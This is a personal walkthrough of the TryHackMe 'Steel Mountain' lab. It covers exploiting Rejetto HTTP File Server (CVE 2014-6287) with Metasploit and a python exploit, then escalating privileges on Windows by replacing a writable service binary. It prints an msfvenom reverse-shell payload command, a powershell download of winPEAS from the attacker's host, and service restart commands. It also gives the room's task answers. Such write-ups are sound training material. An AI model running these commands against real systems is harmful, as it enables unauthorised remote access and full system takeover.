TryHackMe: Steel Mountain

A walkthrough.

Start with nmap.

nmap -A -vv target_ip

You will find web servers on port 80 and 8080.

Access the web server on port 80

I did reverse image search and got the answer.

Another way to do this is to Inspect the page and check the image element.

Task 1: Introduction

Who is the employee of the month?

Bill Harper

Task 2: Initial Access

Scan the machine with nmap. What is the other port running a web server on?

8080

Take a look at the other web server. What file server is running?

Rejetto HTTP File Server
the web server on port 8080

What is the CVE number to exploit this file server?

2014–6287

Use Metasploit to get an initial shell. What is the user flag?

metasploit: search rejetto
set RHOSTS target_ip
set RPORT 8080
run
initial shell
task 2 flag

The flag is in user.txt.

Task 3: Privilege Escalation

So I got the initial shell and I need to further enumerate the machine and escalate the privileges to root.

To enumerate this machine, we will use a powershell script called PowerUp, that’s purpose is to evaluate a Windows machine and determine any abnormalities — “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

You can download the script here.

So let’s download the script to our attackbox:

wget the PowerUp.ps1 file from GitHub
upload the file using Metasploit upload command

To execute this powershell script using meterpreter use the following command to load powershell into meterpreter:

load powershell 

Enter the powershell using the following command:

powershell_shell
enter the powershell
run the script

Take close attention to the CanRestart option that is set to true. What is the name of the name of the service which shows up as an unquoted service path vulnerability?

AdvancedSystemCareService9

The CanRestart option being true, allows us to restart a service on the system, the directory to the application is also write-able. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program!

Now generate a reverse shell as a Windows executable using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=attackbox_ip LPORT=4443 -e x86/shikata_ga_nai -f exe -o Advanced.exe
generating reverse shell using msfvenom

Upload your binary and replace the legitimate one. Then restart the program to get a shell as root.

Note: The service showed up as being unquoted (and could be exploited using this technique), however, in this case we have exploited weak file permissions on the service files instead.

Before we upload our binary let’s stop the vulnerable service that we have identified in the previous steps:

stopping vulnerable service

So, the location was identified previously from the output of PowerUp.ps1, and we will be replacing ASCService.exe with the previously generated payload.

So now to upload the Advanced.exe binary, which we generated using msfvenom, let’s go back to our powershell and put it to background:

background the powershell channel

This will throw us back into meterpreter shell, from where we can use the upload command. It makes sense to rename the Advanced.exe to ASCService.exe.

channel command options

After uploading the file I resume the powershell session using the following command:

channel -i 3 

3 being the ID of the channel that we previously put to background.

I moved the malicious ASCService.exe to Bill’s desktop and its not a necessary step.

A good thing about this task is that I’ve learned some powershell commands :D

replacing the binary

You can see that the file was replaced and its time to start the service.

But before starting the service make sure you have netcat session running on port 4443 (the port we specified when generated the reverse shell payload using msfvenom).

starting the service

It erred out but I still got the shell. Not sure if that’s supposed to be.

established a reverse shell connection

And here is the flag:

task 3 flag

Task 4: Access and Escalation Without Metasploit

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to.

To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

So, we gotta do 3 things:

  • download netcat static binary
  • download the Rejetto HTTP File Server (HFS) 2.3.x RCE exploit
  • download winPEAS

⚠️ I ran into some issues when trying to use he Rejetto HTTP File Server (HFS) 2.3.x exploit downloaded from the exploit-db, because I was doing this task using the THM’s Attackbox, which has port 80 busy by default, as well as the version of python installed there did not support some of the semantics used in the original exploit. So, I fixed this script, you can download the gist. I made it expect the python server to be running on port 8080 instead, so that it can be used within THM’s Attackbox.

Spin up python http.server from the same directory where you saved the downloaded winPEAS and nc binary.

python3 -m http.server 8080

Before running the exploit you will need to edit lines 35 and 36 to contain the IP address of your Attackbox and any port (I used 1443).

rejetto-exploit.py

Also you will need to run a netcat listener on port 1443 in case if you don’t edit the line 36 of the exploit.

Run the rejetto exploit. Script usage is:

python exploit.py <Target IP address> <Target Port Number> 

In our it is port 8080 of the targeted Rejetto server.

So, after you run the exploit twice you will see that you got the 🐚.

🐚

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

powershell -c wget "http://attackbox_ip_address:8080/winPEASany.exe" -outfile "winpeas.exe"

Once we run winPeas, we see that it points us towards unquoted paths. We can see that it provides us with the name of the service it is also running.

To run it just type:

winpeas.exe
source: https://tryhackme.com/room/steelmountain

What powershell -c command could we run to manually find out the service name?

powershell -c "Get-Service"

Now let’s escalate to Administrator with our new found knowledge.

Generate your payload using msfvenom and pull it to the system using powershell.

Now we can move our payload to the unquoted directory winPEAS alerted us to and restart the service with two commands.

First we need to stop the service which we can do like so;

sc stop AdvancedSystemCareService9

Shortly followed by;

sc start AdvancedSystemCareService9

Once this command runs, you will see you gain a shell as Administrator on our listener!

Everything is unknown until it’s known. Self-learner.